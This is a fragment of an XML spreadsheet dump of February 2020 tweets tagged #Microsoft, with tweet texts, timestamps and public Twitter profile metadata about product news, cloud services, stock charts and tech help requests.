    <t>#msft #microsoft 2pics. Hit target perfectly. #StockMarket #stocktrader #StockMarketCrash2020 https://t.co/oOO5HeHVrf</t>
  </si>
  <si>
    <t>{'id': 928908827096965120, 'id_str': '928908827096965120', 'name': 'seanruddy', 'screen_name': 'jjtherocket5', 'location': '', 'description': 'Love doing charts.\n charts are not financial advice.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 77, 'friends_count': 192, 'listed_count': 1, 'created_at': 'Fri Nov 10 08:54:57 +0000 2017', 'favourites_count': 2397, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1902,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</si>
  <si>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Feb 28 17:57:02 +0000 2020</t>
  </si>
  <si>
    <t>How to identify #counterfeit #Microsoft #software. 
 https://t.co/P0muMgxakV https://t.co/fAF3WMfLcO</t>
  </si>
  <si>
    <t>{'id': 1223130008161439744, 'id_str': '1223130008161439744', 'name': 'Benchmark IT Solutions', 'screen_name': 'BenchmarkIT_Sol', 'location': 'Pittsburgh', 'description': 'A team of passionate software technology professionals helping companies build world-class software products. \n#ProductDevelopment #SoftwareProducts', 'url': 'https://t.co/tji19XTtac', 'entities': {'url': {'urls': [{'url': 'https://t.co/tji19XTtac', 'expanded_url': 'http://benchmarkit.solutions/', 'display_url': 'benchmarkit.solutions', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 80, 'friends_count': 187, 'listed_count': 1, 'created_at': 'Fri Jan 31 06:25:12 +0000 2020', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 111, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223136311139135488/S2zycQu6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223136311139135488/S2zycQu6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1223130008161439744/1580452514',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</si>
  <si>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17:55:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Office App now supports #Android dual-screen phones 
#smartphone #microsoftoffice #microsoftofficemobile #dualscreen #androiddualscreen
https://t.co/MsrmoDGlKY via @Technologynow3</t>
  </si>
  <si>
    <t>Fri Feb 28 17:54:14 +0000 2020</t>
  </si>
  <si>
    <t>#cloud revenue project to keep growing strong! Who are you betting will see the most growth out of #microsoft , #amazon and #google ? https://t.co/9xyfHnBZ63</t>
  </si>
  <si>
    <t>Fri Feb 28 17:53:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft launches new $40 million, 5year program to leverage the use of #artificialintelligence for health. #AI #Data2Life @Healthtech1 #NHStech #Healthtech https://t.co/FEzctoBL8b</t>
  </si>
  <si>
    <t>{'id': 2789384546, 'id_str': '2789384546', 'name': 'BLGdataresearch', 'screen_name': 'BLGDataResearch', 'location': 'United Kingdom', 'description': 'Through grant funded research, we bring data to life. Together we are:                    \nâ— Exploring data\nâ— Enhancing knowledge\nâ— Empowering society', 'url': 'http://t.co/cFISEwoyDX', 'entities': {'url': {'urls': [{'url': 'http://t.co/cFISEwoyDX', 'expanded_url': 'http://www.blgdataresearch.org', 'display_url': 'blgdataresearch.org', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1851, 'friends_count': 1460, 'listed_count': 164, 'created_at': 'Thu Sep 04 08:17:33 +0000 2014', 'favourites_count': 1606, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5566,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'http://pbs.twimg.com/profile_images/1156161280337690625/O3XNdLdg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156161280337690625/O3XNdLdg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2789384546/1564485305', 'profile_link_color': '081F2C',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</si>
  <si>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Feb 28 17:52:28 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft wants to launch #SurfaceDuo sooner than holiday 2020 
See: https://t.co/dZ23xe1mrp</t>
  </si>
  <si>
    <t>Fri Feb 28 17:50:49 +0000 2020</t>
  </si>
  <si>
    <t>1 new repository created in Microsoft
- 1 EduSchemaHub
 #GitHub #OpenSource #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 17:50:01 +0000 2020</t>
  </si>
  <si>
    <t>Its Friday. And Emile is doing what he does best in the @GearsofWar universe 
Fake blood goes a long ways. 
@halo
@Slimkati3 
@Juans_Amigo 
@NerdGallagher 
@Xbox
#halospotlight #haloreach #crossover #friday #FridayVibes #toyphotography #BehindTheScenes #gaming #microsoft https://t.co/TfArN4PAUT</t>
  </si>
  <si>
    <t>Fri Feb 28 17:48:14 +0000 2020</t>
  </si>
  <si>
    <t>Here's some critical information for #TrueNAS and #FreeNAS users that utilize Active Directory. #Microsoft is changing the security defaults for Active Directory which will require TrueNAS/FreeNAS updates. Read our blog for more information. #OpenSource https://t.co/BdwDR4BNo7</t>
  </si>
  <si>
    <t>{'id': 20491096, 'id_str': '20491096', 'name': 'iXsystems, Inc.', 'screen_name': 'iXsystems', 'location': 'San Jose, CA', 'description': '#OpenSource Enterprise #Servers &amp; #Storage Solutions\n\n#TrueNAS #FreeNAS #TrueCommand #TrueOS', 'url': 'http://t.co/VKsC1BWILG', 'entities': {'url': {'urls': [{'url': 'http://t.co/VKsC1BWILG', 'expanded_url': 'http://www.iXsystems.com', 'display_url': 'iXsystems.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5809, 'friends_count': 584, 'listed_count': 137, 'created_at': 'Tue Feb 10 04:09:56 +0000 2009', 'favourites_count': 2772, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4737, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D8DFE3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/895685754390691846/AB3SVTFq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/895685754390691846/AB3SVTFq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20491096/1565396128', 'profile_link_color': '0096D7', 'profile_sidebar_border_color': '273C7C', 'profile_sidebar_fill_color': '5176B3', 'profile_text_color': '382238', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 17:46:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts #Cortana drops consumer skills as it refocuses on business users https://t.co/XefuSpEbbd https://t.co/LtnVuEIbw6</t>
  </si>
  <si>
    <t>{'id': 61775276, 'id_str': '61775276', 'name': 'Mumin Al Shawaf (I am Hiring)', 'screen_name': 'alshawafmumin', 'location': 'Toronto, Ontario', 'description': 'Executive #SaaS #entrepreneur scaling #startups. 2 unicorns #netsuite #eloqua and growing #Tophat.\nLove to connect with brilliant minds in the startup community', 'url': 'https://t.co/VWuUIX99lp', 'entities': {'url': {'urls': [{'url': 'https://t.co/VWuUIX99lp', 'expanded_url': 'http://www.tophat.com', 'display_url': 'tophat.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 540, 'friends_count': 1225, 'listed_count': 12, 'created_at': 'Fri Jul 31 13:53:31 +0000 2009', 'favourites_count': 843, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10966,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'http://pbs.twimg.com/profile_images/1225229959452487680/Y3KEmQGN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225229959452487680/Y3KEmQGN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/61775276/1580952610',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</si>
  <si>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17:45:36 +0000 2020</t>
  </si>
  <si>
    <t>7 Key Takeaways from NRF 2020 https://t.co/3V3mUNNPLw
For more info: https://t.co/i7BUjLpi2p #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto #business #technology #startup https://t.co/87uJHBXgAP</t>
  </si>
  <si>
    <t>Fri Feb 28 17:42:42 +0000 2020</t>
  </si>
  <si>
    <t>End-to-end IoT device security with Azure Sphere https://t.co/4DpT8XV165 #Azure #Channel9 #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 17:41:51 +0000 2020</t>
  </si>
  <si>
    <t>The dates are in, lets hack together in 18th! follow the link to register:
https://t.co/EOpvzy1LGM
#hackathon #hack #hitachisolutions #hitachisolutionseurope #hitachisolutionsfamily #microsoft #porto #portugal https://t.co/mNLsRIp3BB</t>
  </si>
  <si>
    <t>{'id': 949628527, 'id_str': '949628527', 'name': 'JoÃ£o Bastos', 'screen_name': 'bastosj10', 'location': 'Oporto, Portugal', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 90, 'listed_count': 1, 'created_at': 'Thu Nov 15 12:12:17 +0000 2012', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 120,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'http://pbs.twimg.com/profile_images/1234408336470265862/wCWUTT57_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234408336470265862/wCWUTT57_normal.jpg',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</si>
  <si>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17:40:00 +0000 2020</t>
  </si>
  <si>
    <t>#MicrosoftTeams guest access is the most read post on the #Microsoft tech community forum.
It has 162k views since 2016 and we're only just getting closer to a solution.
https://t.co/ag9C51etqG</t>
  </si>
  <si>
    <t>Fri Feb 28 17:39:06 +0000 2020</t>
  </si>
  <si>
    <t>A quick intro to the Azure Stack portfolio https://t.co/ajNlyNKOOG #Microsoft</t>
  </si>
  <si>
    <t>SharePoint Roadmap Pitstop: February 2020 https://t.co/AW3WzwYxLV #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 17:36:00 +0000 2020</t>
  </si>
  <si>
    <t>#Bose Frames work with #Microsoft's #navigation tech for the #blind - https://t.co/3btltS9qhN</t>
  </si>
  <si>
    <t>Fri Feb 28 17:35:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft warns #coronavirus hurting #Windows and Surface https://t.co/nbF7MRB6yb via @FinancialTimes
#tech</t>
  </si>
  <si>
    <t>Fri Feb 28 17:31:31 +0000 2020</t>
  </si>
  <si>
    <t>Finally 
#WEEKEND #Microsoft https://t.co/okbffc50zM</t>
  </si>
  <si>
    <t>{'id': 154240448, 'id_str': '154240448', 'name': 'Alae | \u200fØ¢Ù„Ø§Ø¡ ð“‚€', 'screen_name': 'alae089', 'location': "Ã  l'autre bout de la terre", 'description': 'My tweets represent my Opinion - Not sharing important content / Born in the wrong era', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1410, 'friends_count': 448, 'listed_count': 36, 'created_at': 'Thu Jun 10 18:55:39 +0000 2010', 'favourites_count': 43, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 39232, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3B94D9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235157382797373440/9Gq0GUfS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235157382797373440/9Gq0GUfS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/154240448/1555491973', 'profile_link_color': '2B174B', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '95E8EC', 'profile_text_color': '3C3940', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Fri Feb 28 17:31:22 +0000 2020</t>
  </si>
  <si>
    <t>ERROR FOUND #microsoft #tiktok #tiktokph #tiktokcanada https://t.co/4cMgJ2uSSV</t>
  </si>
  <si>
    <t>{'id': 35710813, 'id_str': '35710813', 'name': 'Harold Dave', 'screen_name': 'HaroldDave', 'location': 'Toronto, Ontario', 'description': 'You can âœ¨ | Instagram &amp; Snapchat: @harolddave', 'url': 'https://t.co/xbVpA9iJra', 'entities': {'url': {'urls': [{'url': 'https://t.co/xbVpA9iJra', 'expanded_url': 'https://www.youtube.com/c/HaroldDaveIgcalinos', 'display_url': 'youtube.com/c/HaroldDaveIgâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 829, 'friends_count': 1871, 'listed_count': 6, 'created_at': 'Mon Apr 27 10:05:05 +0000 2009', 'favourites_count': 26816, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 53853,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'http://pbs.twimg.com/profile_images/1224138598645161984/LXnsyqE4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224138598645161984/LXnsyqE4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35710813/1575853410', 'profile_link_color': '009999',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</si>
  <si>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Feb 28 17:30:36 +0000 2020</t>
  </si>
  <si>
    <t>Are you looking for some quick easy Business Central help? Our support page has a lot of free short videos to help with the most commonly asked questions. 
https://t.co/G5wO21cixA
#MSDyn365bc #Microsoft #Support #BusinessCentral https://t.co/sJjKkxZMK3</t>
  </si>
  <si>
    <t>Fri Feb 28 17:30:03 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 17:26:14 +0000 2020</t>
  </si>
  <si>
    <t>Announcing Rust 1.41.1
 https://t.co/XfArPyQWob still needs to #deletegithub which is a #proprietarysoftware trap of #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 17:25:59 +0000 2020</t>
  </si>
  <si>
    <t>SharePoint Roadmap Pitstop: February 2020 #Microsoft #Pitstops #Roadmaps https://t.co/GljinxOoc3 #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Fri Feb 28 17:25:44 +0000 2020</t>
  </si>
  <si>
    <t>To become a complete data scientist one needs to opt for a full-time course instead of a short online course as per Manish Gupta. #microsoft https://t.co/TzotAuOVlN https://t.co/j8s7Sadz91</t>
  </si>
  <si>
    <t>Fri Feb 28 17:25:23 +0000 2020</t>
  </si>
  <si>
    <t>Now thats a gaming chair #Microsoft 1 lap of silverstone #flyinglap https://t.co/gnV9hzDAmd</t>
  </si>
  <si>
    <t>{'id': 2906859511, 'id_str': '2906859511', 'name': 'paul', 'screen_name': 'PaulTrunks', 'location': 'South West, England', 'description': 'live for ska music and darts', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 191, 'friends_count': 638, 'listed_count': 8, 'created_at': 'Sat Nov 22 07:59:00 +0000 2014', 'favourites_count': 1644, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4146,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'http://pbs.twimg.com/profile_images/1234764398901780481/TmnOeEkw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234764398901780481/TmnOeEkw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2906859511/1583225749',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</si>
  <si>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17:25:21 +0000 2020</t>
  </si>
  <si>
    <t>Is your #computer not #booting into #windows you might have a #failingdrive come by #computerrepairtoday #freelancecomputing and have us take a look!
.
.
.
@FLComputing #failing #harddrive #replacement #microsoft... https://t.co/5Vmo72DQrB</t>
  </si>
  <si>
    <t>Fri Feb 28 17:23:35 +0000 2020</t>
  </si>
  <si>
    <t>#redmonk uses to assess #programming language use only projects that #microsoft (a Redmonk client) controls. Some 'research', eh? 
 https://t.co/f7ULI3CKpM</t>
  </si>
  <si>
    <t>Fri Feb 28 17:20:42 +0000 2020</t>
  </si>
  <si>
    <t>Check out Microsoft Surface Pro 4 65W Power Supply #Microsoft https://t.co/1vyIqA4NQd via @eBay</t>
  </si>
  <si>
    <t>{'id': 843543557780783105, 'id_str': '843543557780783105', 'name': 'Stadium Lites Attic Treasures, Trinkets, &amp; Things', 'screen_name': 'CoolTrinkets', 'location': 'Houston, TX', 'description': 'âš¡ï¸Great deals, products and fast shipping! ðŸ˜Ž', 'url': 'https://t.co/eo1weJLaZ0', 'entities': {'url': {'urls': [{'url': 'https://t.co/eo1weJLaZ0', 'expanded_url': 'https://www.ebay.com/usr/stadium_lites_attic', 'display_url': 'ebay.com/usr/stadium_liâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 138, 'friends_count': 229, 'listed_count': 0, 'created_at': 'Sun Mar 19 19:23:51 +0000 2017', 'favourites_count': 166, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 789,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'http://pbs.twimg.com/profile_images/1231974043160662017/25xOHW5-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231974043160662017/25xOHW5-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/843543557780783105/1551388919',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</si>
  <si>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17:19:54 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Refactored code for #dynamics365  Client today, related to #Microsoft recommendations. Setting lookup parameters to New entity form is even easier than before. </t>
  </si>
  <si>
    <t>{'id': 175959175, 'id_str': '175959175', 'name': 'Sinisa Kezic', 'screen_name': 'sinisakezic', 'location': '', 'description': 'CTO and lead architect at Genesis Ltd. Certified specialist for Microsoft Dynamics 365 and MS technology stack.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 30, 'friends_count': 108, 'listed_count': 3, 'created_at': 'Sun Aug 08 03:50:44 +0000 2010', 'favourites_count': 113, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/664199935110287361/TgF-uqZ__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/664199935110287361/TgF-uqZ__normal.jpg',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</si>
  <si>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17:19:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft release #Windows10 #20H1 Insider Preview Build 19041.113 to the #SlowRing   https://t.co/aKKEIPynYI by @mspoweruser</t>
  </si>
  <si>
    <t>Fri Feb 28 17:15:21 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 17:15:08 +0000 2020</t>
  </si>
  <si>
    <t>Monitor your apps as efficiently as possible, even if they're supported by resources outside of #Azure. BindPlane streamlines metric collection for @Azure users monitoring #multicloud, #multidatabase, or #hybridplatform environments. Read more: https://t.co/3lrjslvwoU #microsoft https://t.co/jMce6mX11B</t>
  </si>
  <si>
    <t>Fri Feb 28 17:14:44 +0000 2020</t>
  </si>
  <si>
    <t>I just got to know about  #Microsoft  #Azure  notebooks. 
Neat. loving them so far. 
Here is a sample I got from github:: https://t.co/UyCoknQbkA
https://t.co/9DuDPKLb3f
This is going to be very handy in managing notebooks.
#MachineLearning  #ArtificialIntelligence</t>
  </si>
  <si>
    <t>{'id': 805836691, 'id_str': '805836691', 'name': '~/.sudiprc ðŸ ', 'screen_name': 'sudip_post', 'location': 'Bengaluru South, India', 'description': 'Senior Software  Engineer @ Cleartrip;\nNepali living in Bangalore;\nFiddler of code,computers and some musical instruments', 'url': 'https://t.co/ulEINWNP4i', 'entities': {'url': {'urls': [{'url': 'https://t.co/ulEINWNP4i', 'expanded_url': 'https://www.sudipbhandari.wtf', 'display_url': 'sudipbhandari.wtf', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 190, 'friends_count': 1132, 'listed_count': 3, 'created_at': 'Thu Sep 06 01:59:53 +0000 2012', 'favourites_count': 1608, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1616, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/575714128339165186/8ge2x5W-_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/575714128339165186/8ge2x5W-_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/805836691/1451789632',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</si>
  <si>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17:13:17 +0000 2020</t>
  </si>
  <si>
    <t>There are more and more #startups with #API first approach and #SaaS business model. 
Cloud providers #AWS #Microsoft and others have made this possible. The potential in this space is still enormous.
#startupstories #scaleup #ScaleModel #Cloud #CloudTechnology $MSFT $AMZN</t>
  </si>
  <si>
    <t>{'id': 4765100357, 'id_str': '4765100357', 'name': 'Rihard Jarc', 'screen_name': 'RihardJarc', 'location': '', 'description': 'CEO &amp; co-founder of @typlessAPI #AI invoice OCR, @seekingalpha contributor, tech investor. My tweets are opinions and NOT financial advice. #startup', 'url': 'https://t.co/37iRg2aSGI', 'entities': {'url': {'urls': [{'url': 'https://t.co/37iRg2aSGI', 'expanded_url': 'https://www.typless.com', 'display_url': 'typless.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 404, 'friends_count': 2942, 'listed_count': 4, 'created_at': 'Sun Jan 10 14:43:22 +0000 2016', 'favourites_count': 62, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 68, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222439159916310528/BflmCd6T_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222439159916310528/BflmCd6T_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4765100357/1580288332',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</si>
  <si>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17:12:41 +0000 2020</t>
  </si>
  <si>
    <t>A quick intro to the Azure Stack portfolio https://t.co/C6EHs9HRJd #Azure #Channel9 #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 17:12:01 +0000 2020</t>
  </si>
  <si>
    <t>#ICYMI ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/ncn2CPpf2t #Azure #Cloud #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 17:09:31 +0000 2020</t>
  </si>
  <si>
    <t>Anybody in the PC world... HELLLLLP!! My computer keeps showing low memory not  enough to upgrade to #windows10  Ive deleted everything. Prob even what I need to function lol and still only 1GB and then it drops #Microsoft #windows7 #ladyindistress</t>
  </si>
  <si>
    <t>{'id': 25682753, 'id_str': '25682753', 'name': 'ViriDee', 'screen_name': 'ViriDuron', 'location': 'Illinois, USA', 'description': 'Dreamer,Lover,MoneyMaker,MusicJunkieâ–ªï¸familyâ–ªï¸Thiaâ–ªï¸', 'url': 'https://t.co/8Wx9rV5ouJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/8Wx9rV5ouJ', 'expanded_url': 'http://www.facebook.com/viriduron', 'display_url': 'facebook.com/viriduron', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 56, 'friends_count': 241, 'listed_count': 0, 'created_at': 'Sat Mar 21 15:03:28 +0000 2009', 'favourites_count': 33, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 604,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'http://pbs.twimg.com/profile_images/1045085548560420865/Zx9_9CKR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1045085548560420865/Zx9_9CKR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/25682753/1538002787', 'profile_link_color': '2FC2EF', 'profile_sidebar_border_color': 'E8028B', 'profile_sidebar_fill_color': '252429', 'profile_text_color': '666666', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 17:09:21 +0000 2020</t>
  </si>
  <si>
    <t>Cortana in the upcoming Windows 10 release: focused on your productivity with enhanced security and privacy https://t.co/Dy5aHIP6YU #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 17:08:17 +0000 2020</t>
  </si>
  <si>
    <t>Cortana in the upcoming Windows 10 release: focused on your productivity with enhanced security and privacy: https://t.co/YeDCI9BRMJ #Azure #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 17:07:31 +0000 2020</t>
  </si>
  <si>
    <t>AWS still excels, but other players are not sleeping:
https://t.co/gncTLeC0VF
#cloud #aws #amazon #microsoft #googlecloud #alibabacloud</t>
  </si>
  <si>
    <t>{'id': 1227953978266324993, 'id_str': '1227953978266324993', 'name': 'MORPHEMIC project', 'screen_name': '_morphemic_', 'location': '', 'description': 'MORPHEMIC is EU Horizon 2020 project\nStart date: 01/01/2020, end date: 31.12.2022\nGrant agreement ID: 871643\n12 partners, 7 countries\nMore info:', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Thu Feb 13 13:54:27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'http://pbs.twimg.com/profile_images/1227954589187661825/073NSFed_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227954589187661825/073NSFed_normal.jpg',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</si>
  <si>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17:07:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft launches new program for #B2B #startups
https://t.co/lprRliGTWI https://t.co/xilwkKoOas</t>
  </si>
  <si>
    <t>{'id': 75313608, 'id_str': '75313608', 'name': 'Alexander Jarvis', 'screen_name': 'ADJBlog', 'location': 'London', 'description': 'Fundraising? Does your pitch deck suck? Want pro attention. Head to https://t.co/lZXphTOqG3', 'url': 'https://t.co/5M0mrIXk7w', 'entities': {'url': {'urls': [{'url': 'https://t.co/5M0mrIXk7w', 'expanded_url': 'http://www.alexanderjarvis.com', 'display_url': 'alexanderjarvis.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/lZXphTOqG3', 'expanded_url': 'http://perfectpitchdeck.com', 'display_url': 'perfectpitchdeck.com', 'indices': [68, 91]}]}}, 'protected': False, 'followers_count': 5252, 'friends_count': 1499, 'listed_count': 322, 'created_at': 'Fri Sep 18 15:54:53 +0000 2009', 'favourites_count': 10472, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11711,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'http://pbs.twimg.com/profile_images/745679759204581376/Jk8Zr_4U_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/745679759204581376/Jk8Zr_4U_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/75313608/1464454212',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</si>
  <si>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17:05:20 +0000 2020</t>
  </si>
  <si>
    <t>AWS still excels, but other players are not sleeping:
https://t.co/EkIFglrvpZ
#cloud #aws #amazon #microsoft #googlecloud #alibabacloud</t>
  </si>
  <si>
    <t>{'id': 857590484524556288, 'id_str': '857590484524556288', 'name': 'Melodic Cloud', 'screen_name': 'melodic_cloud', 'location': '', 'description': '', 'url': 'https://t.co/OmVe8TUS8i', 'entities': {'url': {'urls': [{'url': 'https://t.co/OmVe8TUS8i', 'expanded_url': 'http://www.melodic.cloud', 'display_url': 'melodic.cloud', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 99, 'friends_count': 65, 'listed_count': 0, 'created_at': 'Thu Apr 27 13:41:19 +0000 2017', 'favourites_count': 223, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 411, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/867355859252391942/daiRnH0k_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/867355859252391942/daiRnH0k_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/857590484524556288/1495628744',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</si>
  <si>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17:04:19 +0000 2020</t>
  </si>
  <si>
    <t>Empower your #sales and #marketing team with Dynamics 365 for Sales #CRM #MSDynCRM #Microsoft 
https://t.co/ckEqRnCXCJ</t>
  </si>
  <si>
    <t>Fri Feb 28 17:03:47 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Teams Live Events Webcast Recording #Microsoft #MicrosoftTeams @MicrosoftTeams @MicrosoftStream  https://t.co/CoKa3j7eht</t>
  </si>
  <si>
    <t>Fri Feb 28 17:02:51 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge gets a new game and security feature https://t.co/dzBmSrfu1S #edge #Microsoft https://t.co/SNi3m8yiXd</t>
  </si>
  <si>
